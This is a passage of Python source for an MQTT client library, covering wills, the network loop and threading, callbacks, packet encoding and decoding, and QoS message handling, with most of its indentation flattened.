"""Set the timeout in seconds before a message with QoS>0 is retried.
20 seconds by default."""
if retry < 0:
raise ValueError('Invalid retry.')
self._message_retry = retry
def user_data_set(self, userdata):
"""Set the user data variable passed to callbacks. May be any data type."""
self._userdata = userdata
def will_set(self, topic, payload=None, qos=0, retain=False):
"""Set a Will to be sent by the broker in case the client disconnects unexpectedly.
This must be called before connect() to have any effect.
topic: The topic that the will message should be published on.
payload: The message to send as a will. If not given, or set to None a
zero length message will be used as the will. Passing an int or float
will result in the payload being converted to a string representing
that number. If you wish to send a true int/float, use struct.pack() to
create the payload you require.
qos: The quality of service level to use for the will.
retain: If set to true, the will message will be set as the "last known
good"/retained message for the topic.
Raises a ValueError if qos is not 0, 1 or 2, or if topic is None or has
zero string length.
"""
if topic is None or len(topic) == 0:
raise ValueError('Invalid topic.')
if qos<0 or qos>2:
raise ValueError('Invalid QoS level.')
if isinstance(payload, str):
self._will_payload = payload.encode('utf-8')
elif isinstance(payload, bytearray):
self._will_payload = payload
elif isinstance(payload, int) or isinstance(payload, float):
self._will_payload = str(payload)
elif payload is None:
self._will_payload = None
else:
raise TypeError('payload must be a string, bytearray, int, float or None.')
self._will = True
self._will_topic = topic.encode('utf-8')
self._will_qos = qos
self._will_retain = retain
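    # Illustrative usage sketch (not part of the client implementation);
    # `host` is a placeholder for your broker address:
    #
    #   mqttc.will_set("clients/mine/status", payload="offline", qos=1,
    #                  retain=True)
    #   mqttc.connect(host)  # the will must be set before connect()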
def will_clear(self):
""" Removes a will that was previously configured with will_set().
Must be called before connect() to have any effect."""
self._will = False
self._will_topic = ""
self._will_payload = None
self._will_qos = 0
self._will_retain = False
def socket(self):
"""Return the socket or ssl object for this client."""
if self._ssl:
if self._useSecuredWebsocket:
return self._ssl.getSSLSocket()
else:
return self._ssl
else:
return self._sock
def loop_forever(self, timeout=1.0, max_packets=1, retry_first_connection=False):
"""This function call loop() for you in an infinite blocking loop. It
is useful for the case where you only want to run the MQTT client loop
in your program.
loop_forever() will handle reconnecting for you. If you call
disconnect() in a callback it will return.
timeout: The time in seconds to wait for incoming/outgoing network
traffic before timing out and returning.
max_packets: Not currently used.
retry_first_connection: Should the first connection attempt be retried on failure.
Raises socket.error on first connection failures unless retry_first_connection=True
"""
run = True
while run:
if self._state == mqtt_cs_connect_async:
try:
self.reconnect()
except socket.error:
if not retry_first_connection:
raise
self._easy_log(MQTT_LOG_DEBUG, "Connection failed, retrying")
self._backoffCore.backOff()
# time.sleep(1)
else:
break
while run:
rc = MQTT_ERR_SUCCESS
while rc == MQTT_ERR_SUCCESS:
rc = self.loop(timeout, max_packets)
# We don't need to worry about locking here, because we've
# either called loop_forever() when in single threaded mode, or
# in multi threaded mode when loop_stop() has been called and
# so no other threads can access _current_out_packet,
# _out_packet or _messages.
if (self._thread_terminate is True
and self._current_out_packet is None
and len(self._out_packet) == 0
and len(self._out_messages) == 0):
rc = 1
run = False
self._state_mutex.acquire()
if self._state == mqtt_cs_disconnecting or run is False or self._thread_terminate is True:
run = False
self._state_mutex.release()
else:
self._state_mutex.release()
self._backoffCore.backOff()
# time.sleep(1)
self._state_mutex.acquire()
if self._state == mqtt_cs_disconnecting or run is False or self._thread_terminate is True:
run = False
self._state_mutex.release()
else:
self._state_mutex.release()
try:
self.reconnect()
            except socket.error:
                pass
return rc
def loop_start(self):
"""This is part of the threaded client interface. Call this once to
start a new thread to process network traffic. This provides an
alternative to repeatedly calling loop() yourself.
"""
if self._thread is not None:
return MQTT_ERR_INVAL
self._thread_terminate = False
self._thread = threading.Thread(target=self._thread_main)
self._thread.daemon = True
self._thread.start()
def loop_stop(self, force=False):
"""This is part of the threaded client interface. Call this once to
stop the network thread previously created with loop_start(). This call
will block until the network thread finishes.
The force parameter is currently ignored.
"""
if self._thread is None:
return MQTT_ERR_INVAL
self._thread_terminate = True
self._thread.join()
self._thread = None
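    # Illustrative usage sketch of the threaded interface (not part of the
    # client implementation):
    #
    #   mqttc.loop_start()                  # network I/O now runs in a thread
    #   mqttc.publish("my/topic", "hello")  # safe to call from the main thread
    #   ...
    #   mqttc.loop_stop()                   # blocks until the thread exits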
def message_callback_add(self, sub, callback):
"""Register a message callback for a specific topic.
Messages that match 'sub' will be passed to 'callback'. Any
non-matching messages will be passed to the default on_message
callback.
Call multiple times with different 'sub' to define multiple topic
specific callbacks.
Topic specific callbacks may be removed with
message_callback_remove()."""
if callback is None or sub is None:
raise ValueError("sub and callback must both be defined.")
self._callback_mutex.acquire()
for i in range(0, len(self.on_message_filtered)):
if self.on_message_filtered[i][0] == sub:
self.on_message_filtered[i] = (sub, callback)
self._callback_mutex.release()
return
self.on_message_filtered.append((sub, callback))
self._callback_mutex.release()
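    # Illustrative usage sketch (not part of the client implementation):
    #
    #   def on_sensor(client, userdata, msg):
    #       print(msg.topic, msg.payload)
    #
    #   mqttc.message_callback_add("sensors/#", on_sensor)
    #   # Messages that do not match "sensors/#" still go to mqttc.on_message.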
def message_callback_remove(self, sub):
"""Remove a message callback previously registered with
message_callback_add()."""
if sub is None:
raise ValueError("sub must defined.")
self._callback_mutex.acquire()
for i in range(0, len(self.on_message_filtered)):
if self.on_message_filtered[i][0] == sub:
self.on_message_filtered.pop(i)
self._callback_mutex.release()
return
self._callback_mutex.release()
# ============================================================
# Private functions
# ============================================================
def _loop_rc_handle(self, rc):
if rc:
if self._ssl:
self._ssl.close()
self._ssl = None
elif self._sock:
self._sock.close()
self._sock = None
self._state_mutex.acquire()
if self._state == mqtt_cs_disconnecting:
rc = MQTT_ERR_SUCCESS
self._state_mutex.release()
self._callback_mutex.acquire()
if self.on_disconnect:
self._in_callback = True
self.on_disconnect(self, self._userdata, rc)
self._in_callback = False
self._callback_mutex.release()
return rc
def _packet_read(self):
        # This gets called if select() indicates that there is network data
        # available - ie. at least one byte. What we do depends on what data we
        # already have.
        # If we've not got a command, attempt to read one and save it. This should
        # always work because it's only a single byte.
        # Then try to read the remaining length. This may fail because it may
        # be more than one byte - we will need to save data pending the next
        # read if it does fail.
# Then try to read the remaining payload, where 'payload' here means the
# combined variable header and actual payload. This is the most likely to
# fail due to longer length, so save current data and current position.
# After all data is read, send to _mqtt_handle_packet() to deal with.
# Finally, free the memory and reset everything to starting conditions.
if self._in_packet['command'] == 0:
try:
if self._ssl:
command = self._ssl.read(1)
else:
command = self._sock.recv(1)
except socket.error as err:
if self._ssl and (err.errno == ssl.SSL_ERROR_WANT_READ or err.errno == ssl.SSL_ERROR_WANT_WRITE):
return MQTT_ERR_AGAIN
if err.errno == EAGAIN:
return MQTT_ERR_AGAIN
print(err)
return 1
else:
if len(command) == 0:
return 1
command = struct.unpack("!B", command)
self._in_packet['command'] = command[0]
if self._in_packet['have_remaining'] == 0:
# Read remaining
# Algorithm for decoding taken from pseudo code at
# http://publib.boulder.ibm.com/infocenter/wmbhelp/v6r0m0/topic/com.ibm.etools.mft.doc/ac10870_.htm
while True:
try:
if self._ssl:
byte = self._ssl.read(1)
else:
byte = self._sock.recv(1)
except socket.error as err:
if self._ssl and (err.errno == ssl.SSL_ERROR_WANT_READ or err.errno == ssl.SSL_ERROR_WANT_WRITE):
return MQTT_ERR_AGAIN
if err.errno == EAGAIN:
return MQTT_ERR_AGAIN
print(err)
return 1
else:
byte = struct.unpack("!B", byte)
byte = byte[0]
self._in_packet['remaining_count'].append(byte)
# Max 4 bytes length for remaining length as defined by protocol.
# Anything more likely means a broken/malicious client.
if len(self._in_packet['remaining_count']) > 4:
return MQTT_ERR_PROTOCOL
self._in_packet['remaining_length'] = self._in_packet['remaining_length'] + (byte & 127)*self._in_packet['remaining_mult']
self._in_packet['remaining_mult'] = self._in_packet['remaining_mult'] * 128
if (byte & 128) == 0:
break
self._in_packet['have_remaining'] = 1
self._in_packet['to_process'] = self._in_packet['remaining_length']
while self._in_packet['to_process'] > 0:
try:
if self._ssl:
data = self._ssl.read(self._in_packet['to_process'])
else:
data = self._sock.recv(self._in_packet['to_process'])
except socket.error as err:
if self._ssl and (err.errno == ssl.SSL_ERROR_WANT_READ or err.errno == ssl.SSL_ERROR_WANT_WRITE):
return MQTT_ERR_AGAIN
if err.errno == EAGAIN:
return MQTT_ERR_AGAIN
print(err)
return 1
else:
self._in_packet['to_process'] = self._in_packet['to_process'] - len(data)
self._in_packet['packet'] = self._in_packet['packet'] + data
# All data for this packet is read.
self._in_packet['pos'] = 0
rc = self._packet_handle()
# Free data and reset values
self._in_packet = dict(
command=0,
have_remaining=0,
remaining_count=[],
remaining_mult=1,
remaining_length=0,
packet=b"",
to_process=0,
pos=0)
self._msgtime_mutex.acquire()
self._last_msg_in = time.time()
self._msgtime_mutex.release()
return rc
def _packet_write(self):
self._current_out_packet_mutex.acquire()
while self._current_out_packet:
packet = self._current_out_packet
try:
if self._ssl:
write_length = self._ssl.write(packet['packet'][packet['pos']:])
else:
write_length = self._sock.send(packet['packet'][packet['pos']:])
except AttributeError:
self._current_out_packet_mutex.release()
return MQTT_ERR_SUCCESS
except socket.error as err:
self._current_out_packet_mutex.release()
if self._ssl and (err.errno == ssl.SSL_ERROR_WANT_READ or err.errno == ssl.SSL_ERROR_WANT_WRITE):
return MQTT_ERR_AGAIN
if err.errno == EAGAIN:
return MQTT_ERR_AGAIN
print(err)
return 1
if write_length > 0:
packet['to_process'] = packet['to_process'] - write_length
packet['pos'] = packet['pos'] + write_length
if packet['to_process'] == 0:
if (packet['command'] & 0xF0) == PUBLISH and packet['qos'] == 0:
self._callback_mutex.acquire()
if self.on_publish:
self._in_callback = True
self.on_publish(self, self._userdata, packet['mid'])
self._in_callback = False
self._callback_mutex.release()
if (packet['command'] & 0xF0) == DISCONNECT:
self._current_out_packet_mutex.release()
self._msgtime_mutex.acquire()
self._last_msg_out = time.time()
self._msgtime_mutex.release()
self._callback_mutex.acquire()
if self.on_disconnect:
self._in_callback = True
self.on_disconnect(self, self._userdata, 0)
self._in_callback = False
self._callback_mutex.release()
if self._ssl:
self._ssl.close()
self._ssl = None
if self._sock:
self._sock.close()
self._sock = None
return MQTT_ERR_SUCCESS
self._out_packet_mutex.acquire()
if len(self._out_packet) > 0:
self._current_out_packet = self._out_packet.pop(0)
else:
self._current_out_packet = None
self._out_packet_mutex.release()
else:
pass # FIXME
self._current_out_packet_mutex.release()
self._msgtime_mutex.acquire()
self._last_msg_out = time.time()
self._msgtime_mutex.release()
return MQTT_ERR_SUCCESS
def _easy_log(self, level, buf):
if self.on_log:
self.on_log(self, self._userdata, level, buf)
def _check_keepalive(self):
now = time.time()
self._msgtime_mutex.acquire()
last_msg_out = self._last_msg_out
last_msg_in = self._last_msg_in
self._msgtime_mutex.release()
if (self._sock is not None or self._ssl is not None) and (now - last_msg_out >= self._keepalive or now - last_msg_in >= self._keepalive):
if self._state == mqtt_cs_connected and self._ping_t == 0:
self._send_pingreq()
self._msgtime_mutex.acquire()
self._last_msg_out = now
self._last_msg_in = now
self._msgtime_mutex.release()
else:
if self._ssl:
self._ssl.close()
self._ssl = None
elif self._sock:
self._sock.close()
self._sock = None
if self._state == mqtt_cs_disconnecting:
rc = MQTT_ERR_SUCCESS
else:
rc = 1
self._callback_mutex.acquire()
if self.on_disconnect:
self._in_callback = True
self.on_disconnect(self, self._userdata, rc)
self._in_callback = False
self._callback_mutex.release()
def _mid_generate(self):
self._last_mid = self._last_mid + 1
if self._last_mid == 65536:
self._last_mid = 1
return self._last_mid
def _topic_wildcard_len_check(self, topic):
# Search for + or # in a topic. Return MQTT_ERR_INVAL if found.
# Also returns MQTT_ERR_INVAL if the topic string is too long.
# Returns MQTT_ERR_SUCCESS if everything is fine.
if '+' in topic or '#' in topic or len(topic) == 0 or len(topic) > 65535:
return MQTT_ERR_INVAL
else:
return MQTT_ERR_SUCCESS
def _send_pingreq(self):
self._easy_log(MQTT_LOG_DEBUG, "Sending PINGREQ")
rc = self._send_simple_command(PINGREQ)
if rc == MQTT_ERR_SUCCESS:
self._ping_t = time.time()
return rc
def _send_pingresp(self):
self._easy_log(MQTT_LOG_DEBUG, "Sending PINGRESP")
return self._send_simple_command(PINGRESP)
def _send_puback(self, mid):
self._easy_log(MQTT_LOG_DEBUG, "Sending PUBACK (Mid: "+str(mid)+")")
return self._send_command_with_mid(PUBACK, mid, False)
def _send_pubcomp(self, mid):
self._easy_log(MQTT_LOG_DEBUG, "Sending PUBCOMP (Mid: "+str(mid)+")")
return self._send_command_with_mid(PUBCOMP, mid, False)
def _pack_remaining_length(self, packet, remaining_length):
remaining_bytes = []
while True:
byte = remaining_length % 128
remaining_length = remaining_length // 128
# If there are more digits to encode, set the top bit of this digit
if remaining_length > 0:
byte = byte | 0x80
remaining_bytes.append(byte)
packet.extend(struct.pack("!B", byte))
if remaining_length == 0:
# FIXME - this doesn't deal with incorrectly large payloads
return packet
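    # Worked example of the encoding above, for remaining_length = 321:
    #   321 % 128 = 65, 321 // 128 = 2 -> 2 > 0, so emit 65 | 0x80 = 0xC1
    #     2 % 128 =  2,   2 // 128 = 0 -> emit 0x02 and stop
    # i.e. 321 is encoded as the two bytes 0xC1 0x02, matching the MQTT
    # variable-length encoding.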
def _pack_str16(self, packet, data):
if sys.version_info[0] < 3:
if isinstance(data, bytearray):
packet.extend(struct.pack("!H", len(data)))
packet.extend(data)
elif isinstance(data, str):
udata = data.encode('utf-8')
pack_format = "!H" + str(len(udata)) + "s"
packet.extend(struct.pack(pack_format, len(udata), udata))
elif isinstance(data, unicode):
udata = data.encode('utf-8')
pack_format = "!H" + str(len(udata)) + "s"
packet.extend(struct.pack(pack_format, len(udata), udata))
else:
raise TypeError
else:
if isinstance(data, bytearray) or isinstance(data, bytes):
packet.extend(struct.pack("!H", len(data)))
packet.extend(data)
elif isinstance(data, str):
udata = data.encode('utf-8')
pack_format = "!H" + str(len(udata)) + "s"
packet.extend(struct.pack(pack_format, len(udata), udata))
else:
raise TypeError
def _send_publish(self, mid, topic, payload=None, qos=0, retain=False, dup=False):
if self._sock is None and self._ssl is None:
return MQTT_ERR_NO_CONN
utopic = topic.encode('utf-8')
command = PUBLISH | ((dup&0x1)<<3) | (qos<<1) | retain
packet = bytearray()
packet.extend(struct.pack("!B", command))
if payload is None:
remaining_length = 2+len(utopic)
self._easy_log(MQTT_LOG_DEBUG, "Sending PUBLISH (d"+str(dup)+", q"+str(qos)+", r"+str(int(retain))+", m"+str(mid)+", '"+topic+"' (NULL payload)")
else:
if isinstance(payload, str):
upayload = payload.encode('utf-8')
payloadlen = len(upayload)
elif isinstance(payload, bytearray):
payloadlen = len(payload)
            elif sys.version_info[0] < 3 and isinstance(payload, unicode):
                upayload = payload.encode('utf-8')
                payloadlen = len(upayload)
remaining_length = 2+len(utopic) + payloadlen
self._easy_log(MQTT_LOG_DEBUG, "Sending PUBLISH (d"+str(dup)+", q"+str(qos)+", r"+str(int(retain))+", m"+str(mid)+", '"+topic+"', ... ("+str(payloadlen)+" bytes)")
if qos > 0:
# For message id
remaining_length = remaining_length + 2
self._pack_remaining_length(packet, remaining_length)
self._pack_str16(packet, topic)
if qos > 0:
# For message id
packet.extend(struct.pack("!H", mid))
if payload is not None:
if isinstance(payload, str):
pack_format = str(payloadlen) + "s"
packet.extend(struct.pack(pack_format, upayload))
elif isinstance(payload, bytearray):
packet.extend(payload)
            elif sys.version_info[0] < 3 and isinstance(payload, unicode):
                pack_format = str(payloadlen) + "s"
                packet.extend(struct.pack(pack_format, upayload))
else:
raise TypeError('payload must be a string, unicode or a bytearray.')
return self._packet_queue(PUBLISH, packet, mid, qos)
def _send_pubrec(self, mid):
self._easy_log(MQTT_LOG_DEBUG, "Sending PUBREC (Mid: "+str(mid)+")")
return self._send_command_with_mid(PUBREC, mid, False)
def _send_pubrel(self, mid, dup=False):
self._easy_log(MQTT_LOG_DEBUG, "Sending PUBREL (Mid: "+str(mid)+")")
return self._send_command_with_mid(PUBREL|2, mid, dup)
def _send_command_with_mid(self, command, mid, dup):
# For PUBACK, PUBCOMP, PUBREC, and PUBREL
if dup:
command = command | 8
remaining_length = 2
packet = struct.pack('!BBH', command, remaining_length, mid)
return self._packet_queue(command, packet, mid, 1)
def _send_simple_command(self, command):
# For DISCONNECT, PINGREQ and PINGRESP
remaining_length = 0
packet = struct.pack('!BB', command, remaining_length)
return self._packet_queue(command, packet, 0, 0)
def _send_connect(self, keepalive, clean_session):
if self._protocol == MQTTv31:
protocol = PROTOCOL_NAMEv31
proto_ver = 3
else:
protocol = PROTOCOL_NAMEv311
proto_ver = 4
remaining_length = 2+len(protocol) + 1+1+2 + 2+len(self._client_id)
connect_flags = 0
if clean_session:
connect_flags = connect_flags | 0x02
if self._will:
if self._will_payload is not None:
remaining_length = remaining_length + 2+len(self._will_topic) + 2+len(self._will_payload)
else:
remaining_length = remaining_length + 2+len(self._will_topic) + 2
connect_flags = connect_flags | 0x04 | ((self._will_qos&0x03) << 3) | ((self._will_retain&0x01) << 5)
if self._username:
remaining_length = remaining_length + 2+len(self._username)
connect_flags = connect_flags | 0x80
if self._password:
connect_flags = connect_flags | 0x40
remaining_length = remaining_length + 2+len(self._password)
command = CONNECT
packet = bytearray()
packet.extend(struct.pack("!B", command))
self._pack_remaining_length(packet, remaining_length)
packet.extend(struct.pack("!H"+str(len(protocol))+"sBBH", len(protocol), protocol, proto_ver, connect_flags, keepalive))
self._pack_str16(packet, self._client_id)
if self._will:
self._pack_str16(packet, self._will_topic)
if self._will_payload is None or len(self._will_payload) == 0:
packet.extend(struct.pack("!H", 0))
else:
self._pack_str16(packet, self._will_payload)
if self._username:
self._pack_str16(packet, self._username)
if self._password:
self._pack_str16(packet, self._password)
self._keepalive = keepalive
return self._packet_queue(command, packet, 0, 0)
def _send_disconnect(self):
return self._send_simple_command(DISCONNECT)
def _send_subscribe(self, dup, topics):
remaining_length = 2
for t in topics:
remaining_length = remaining_length + 2+len(t[0])+1
command = SUBSCRIBE | (dup<<3) | (1<<1)
packet = bytearray()
packet.extend(struct.pack("!B", command))
self._pack_remaining_length(packet, remaining_length)
local_mid = self._mid_generate()
packet.extend(struct.pack("!H", local_mid))
for t in topics:
self._pack_str16(packet, t[0])
packet.extend(struct.pack("B", t[1]))
return (self._packet_queue(command, packet, local_mid, 1), local_mid)
def _send_unsubscribe(self, dup, topics):
remaining_length = 2
for t in topics:
remaining_length = remaining_length + 2+len(t)
command = UNSUBSCRIBE | (dup<<3) | (1<<1)
packet = bytearray()
packet.extend(struct.pack("!B", command))
self._pack_remaining_length(packet, remaining_length)
local_mid = self._mid_generate()
packet.extend(struct.pack("!H", local_mid))
for t in topics:
self._pack_str16(packet, t)
return (self._packet_queue(command, packet, local_mid, 1), local_mid)
def _message_retry_check_actual(self, messages, mutex):
mutex.acquire()
now = time.time()
for m in messages:
if m.timestamp + self._message_retry < now:
if m.state == mqtt_ms_wait_for_puback or m.state == mqtt_ms_wait_for_pubrec:
m.timestamp = now
m.dup = True
self._send_publish(m.mid, m.topic, m.payload, m.qos, m.retain, m.dup)
elif m.state == mqtt_ms_wait_for_pubrel:
m.timestamp = now
m.dup = True
self._send_pubrec(m.mid)
elif m.state == mqtt_ms_wait_for_pubcomp:
m.timestamp = now
m.dup = True
self._send_pubrel(m.mid, True)
mutex.release()
def _message_retry_check(self):
self._message_retry_check_actual(self._out_messages, self._out_message_mutex)
self._message_retry_check_actual(self._in_messages, self._in_message_mutex)
def _messages_reconnect_reset_out(self):
self._out_message_mutex.acquire()
self._inflight_messages = 0
for m in self._out_messages:
m.timestamp = 0
if self._max_inflight_messages == 0 or self._inflight_messages < self._max_inflight_messages:
if m.qos == 0:
m.state = mqtt_ms_publish
elif m.qos == 1:
#self._inflight_messages = self._inflight_messages + 1
if m.state == mqtt_ms_wait_for_puback:
m.dup = True
m.state = mqtt_ms_publish
elif m.qos == 2:
#self._inflight_messages = self._inflight_messages + 1
if m.state == mqtt_ms_wait_for_pubcomp:
m.state = mqtt_ms_resend_pubrel
m.dup = True
else:
if m.state == mqtt_ms_wait_for_pubrec:
m.dup = True
m.state = mqtt_ms_publish
else:
m.state = mqtt_ms_queued
self._out_message_mutex.release()
def _messages_reconnect_reset_in(self):
        self._in_message_mutex.acquire()
        # Keep only QoS 2 messages (their state is preserved); building a new
        # list avoids mutating the list while iterating over it.
        self._in_messages = [m for m in self._in_messages if m.qos == 2]
        for m in self._in_messages:
            m.timestamp = 0
        self._in_message_mutex.release()
def _messages_reconnect_reset(self):
self._messages_reconnect_reset_out()
self._messages_reconnect_reset_in()
def _packet_queue(self, command, packet, mid, qos):
mpkt = dict(
command = command,
mid = mid,
qos = qos,
pos = 0,
to_process = len(packet),
packet = packet)
self._out_packet_mutex.acquire()
self._out_packet.append(mpkt)
if self._current_out_packet_mutex.acquire(False):
if self._current_out_packet is None and len(self._out_packet) > 0:
self._current_out_packet = self._out_packet.pop(0)
self._current_out_packet_mutex.release()
self._out_packet_mutex.release()
# Write a single byte to sockpairW (connected to sockpairR) to break
# out of select() if in threaded mode.
try:
self._sockpairW.send(sockpair_data)
except socket.error as err:
if err.errno != EAGAIN:
raise
if not self._in_callback and self._thread is None:
return self.loop_write()
else:
return MQTT_ERR_SUCCESS
def _packet_handle(self):
cmd = self._in_packet['command']&0xF0
if cmd == PINGREQ:
return self._handle_pingreq()
elif cmd == PINGRESP:
return self._handle_pingresp()
elif cmd == PUBACK:
return self._handle_pubackcomp("PUBACK")
elif cmd == PUBCOMP:
return self._handle_pubackcomp("PUBCOMP")
elif cmd == PUBLISH:
return self._handle_publish()
elif cmd == PUBREC:
return self._handle_pubrec()
elif cmd == PUBREL:
return self._handle_pubrel()
elif cmd == CONNACK:
return self._handle_connack()
elif cmd == SUBACK:
return self._handle_suback()
elif cmd == UNSUBACK:
return self._handle_unsuback()
else:
# If we don't recognise the command, return an error straight away.
self._easy_log(MQTT_LOG_ERR, "Error: Unrecognised command "+str(cmd))
return MQTT_ERR_PROTOCOL
def _handle_pingreq(self):
if self._strict_protocol:
if self._in_packet['remaining_length'] != 0:
return MQTT_ERR_PROTOCOL
self._easy_log(MQTT_LOG_DEBUG, "Received PINGREQ")
return self._send_pingresp()
def _handle_pingresp(self):
if self._strict_protocol:
if self._in_packet['remaining_length'] != 0:
return MQTT_ERR_PROTOCOL
# No longer waiting for a PINGRESP.
self._ping_t = 0
self._easy_log(MQTT_LOG_DEBUG, "Received PINGRESP")
return MQTT_ERR_SUCCESS
def _handle_connack(self):
if self._strict_protocol:
if self._in_packet['remaining_length'] != 2:
return MQTT_ERR_PROTOCOL
if len(self._in_packet['packet']) != 2:
return MQTT_ERR_PROTOCOL
(flags, result) = struct.unpack("!BB", self._in_packet['packet'])
if result == CONNACK_REFUSED_PROTOCOL_VERSION and self._protocol == MQTTv311:
self._easy_log(MQTT_LOG_DEBUG, "Received CONNACK ("+str(flags)+", "+str(result)+"), attempting downgrade to MQTT v3.1.")
# Downgrade to MQTT v3.1
self._protocol = MQTTv31
return self.reconnect()
if result == 0:
self._state = mqtt_cs_connected
self._easy_log(MQTT_LOG_DEBUG, "Received CONNACK ("+str(flags)+", "+str(result)+")")
self._callback_mutex.acquire()
if self.on_connect:
self._in_callback = True
if sys.version_info[0] < 3:
argcount = self.on_connect.func_code.co_argcount
else:
argcount = self.on_connect.__code__.co_argcount
if argcount == 3:
self.on_connect(self, self._userdata, result)
else:
flags_dict = dict()
flags_dict['session present'] = flags & 0x01
self.on_connect(self, self._userdata, flags_dict, result)
self._in_callback = False
self._callback_mutex.release()
# Start counting for stable connection
self._backoffCore.startStableConnectionTimer()
if result == 0:
rc = 0
self._out_message_mutex.acquire()
for m in self._out_messages:
m.timestamp = time.time()
if m.state == mqtt_ms_queued:
self.loop_write() # Process outgoing messages that have just been queued up
self._out_message_mutex.release()
return MQTT_ERR_SUCCESS
if m.qos == 0:
self._in_callback = True # Don't call loop_write after _send_publish()
rc = self._send_publish(m.mid, m.topic, m.payload, m.qos, m.retain, m.dup)
self._in_callback = False
if rc != 0:
self._out_message_mutex.release()
return rc
elif m.qos == 1:
if m.state == mqtt_ms_publish:
self._inflight_messages = self._inflight_messages + 1
m.state = mqtt_ms_wait_for_puback
self._in_callback = True # Don't call loop_write after _send_publish()
rc = self._send_publish(m.mid, m.topic, m.payload, m.qos, m.retain, m.dup)
self._in_callback = False
if rc != 0:
self._out_message_mutex.release()
return rc
elif m.qos == 2:
if m.state == mqtt_ms_publish:
self._inflight_messages = self._inflight_messages + 1
m.state = mqtt_ms_wait_for_pubrec
self._in_callback = True # Don't call loop_write after _send_publish()
rc = self._send_publish(m.mid, m.topic, m.payload, m.qos, m.retain, m.dup)
self._in_callback = False
if rc != 0:
self._out_message_mutex.release()
return rc
elif m.state == mqtt_ms_resend_pubrel:
self._inflight_messages = self._inflight_messages + 1
m.state = mqtt_ms_wait_for_pubcomp
self._in_callback = True # Don't call loop_write after _send_pubrel()
rc = self._send_pubrel(m.mid, m.dup)
self._in_callback = False
if rc != 0:
self._out_message_mutex.release()
return rc
self.loop_write() # Process outgoing messages that have just been queued up
self._out_message_mutex.release()
return rc
elif result > 0 and result < 6:
return MQTT_ERR_CONN_REFUSED
else:
return MQTT_ERR_PROTOCOL
def _handle_suback(self):
self._easy_log(MQTT_LOG_DEBUG, "Received SUBACK")
pack_format = "!H" + str(len(self._in_packet['packet'])-2) + 's'
(mid, packet) = struct.unpack(pack_format, self._in_packet['packet'])
pack_format = "!" + "B"*len(packet)
granted_qos = struct.unpack(pack_format, packet)
self._callback_mutex.acquire()
if self.on_subscribe:
self._in_callback = True
self.on_subscribe(self, self._userdata, mid, granted_qos)
self._in_callback = False
self._callback_mutex.release()
return MQTT_ERR_SUCCESS
def _handle_publish(self):
rc = 0
header = self._in_packet['command']
message = MQTTMessage()
message.dup = (header & 0x08)>>3
message.qos = (header & 0x06)>>1
message.retain = (header & 0x01)
pack_format = "!H" + str(len(self._in_packet['packet'])-2) + 's'
(slen, packet) = struct.unpack(pack_format, self._in_packet['packet'])
pack_format = '!' + str(slen) + 's' + str(len(packet)-slen) + 's'
(message.topic, packet) = struct.unpack(pack_format, packet)
if len(message.topic) == 0:
return MQTT_ERR_PROTOCOL
if sys.version_info[0] >= 3:
message.topic = message.topic.decode('utf-8')
if message.qos > 0:
pack_format = "!H" + str(len(packet)-2) + 's'
(message.mid, packet) = struct.unpack(pack_format, packet)
message.payload = packet
self._easy_log(
MQTT_LOG_DEBUG,
"Received PUBLISH (d"+str(message.dup)+
", q"+str(message.qos)+", r"+str(message.retain)+
", m"+str(message.mid)+", '"+message.topic+
"', ... ("+str(len(message.payload))+" bytes)")
message.timestamp = time.time()
if message.qos == 0:
self._handle_on_message(message)
return MQTT_ERR_SUCCESS
elif message.qos == 1:
rc = self._send_puback(message.mid)
self._handle_on_message(message)
return rc
elif message.qos == 2:
rc = self._send_pubrec(message.mid)
message.state = mqtt_ms_wait_for_pubrel
self._in_message_mutex.acquire()
self._in_messages.append(message)
self._in_message_mutex.release()
return rc
else:
return MQTT_ERR_PROTOCOL
def _handle_pubrel(self):
if self._strict_protocol:
if self._in_packet['remaining_length'] != 2:
return MQTT_ERR_PROTOCOL
if len(self._in_packet['packet']) != 2:
return MQTT_ERR_PROTOCOL
mid = struct.unpack("!H", self._in_packet['packet'])
mid = mid[0]
self._easy_log(MQTT_LOG_DEBUG, "Received PUBREL (Mid: "+str(mid)+")")
self._in_message_mutex.acquire()
for i in range(len(self._in_messages)):
if self._in_messages[i].mid == mid:
# Only pass the message on if we have removed it from the queue - this
# prevents multiple callbacks for the same message.
self._handle_on_message(self._in_messages[i])
self._in_messages.pop(i)
self._inflight_messages = self._inflight_messages - 1
if self._max_inflight_messages > 0:
self._out_message_mutex.acquire()
rc = self._update_inflight()
self._out_message_mutex.release()
if rc != MQTT_ERR_SUCCESS:
self._in_message_mutex.release()
return rc
self._in_message_mutex.release()
return self._send_pubcomp(mid)
self._in_message_mutex.release()
return MQTT_ERR_SUCCESS
def _update_inflight(self):
        # Don't lock _out_message_mutex here; the caller already holds it.
for m in self._out_messages:
if self._inflight_messages < self._max_inflight_messages:
if m.qos > 0 and m.state == mqtt_ms_queued:
self._inflight_messages = self._inflight_messages + 1
if m.qos == 1:
m.state = mqtt_ms_wait_for_puback
elif m.qos == 2:
m.state = mqtt_ms_wait_for_pubrec
rc = self._send_publish(m.mid, m.topic, m.payload, m.qos, m.retain, m.dup)
if rc != 0:
return rc
else:
return MQTT_ERR_SUCCESS
return MQTT_ERR_SUCCESS
def _handle_pubrec(self):
if self._strict_protocol:
if self._in_packet['remaining_length'] != 2:
return MQTT_ERR_PROTOCOL
mid = struct.unpack("!H", self._in_packet['packet'])
mid = mid[0]
self._easy_log(MQTT_LOG_DEBUG, "Received PUBREC (Mid: "+str(mid)+")")
self._out_message_mutex.acquire()
for m in self._out_messages:
if m.mid == mid:
m.state = mqtt_ms_wait_for_pubcomp
m.timestamp = time.time()
self._out_message_mutex.release()
return self._send_pubrel(mid, False)
self._out_message_mutex.release()
return MQTT_ERR_SUCCESS
def _handle_unsuback(self):
if self._strict_protocol:
if self._in_packet['remaining_length'] != 2:
return MQTT_ERR_PROTOCOL
mid = struct.unpack("!H", self._in_packet['packet'])
mid = mid[0]
self._easy_log(MQTT_LOG_DEBUG, "Received UNSUBACK (Mid: "+str(mid)+")")
self._callback_mutex.acquire()
if self.on_unsubscribe:
self._in_callback = True
self.on_unsubscribe(self, self._userdata, mid)
self._in_callback = False
self._callback_mutex.release()
return MQTT_ERR_SUCCESS
def _handle_pubackcomp(self, cmd):
if self._strict_protocol:
if self._in_packet['remaining_length'] != 2:
return MQTT_ERR_PROTOCOL
mid = struct.unpack("!H", self._in_packet['packet'])
mid = mid[0]
self._easy_log(MQTT_LOG_DEBUG, "Received "+cmd+" (Mid: "+str(mid)+")")
self._out_message_mutex.acquire()
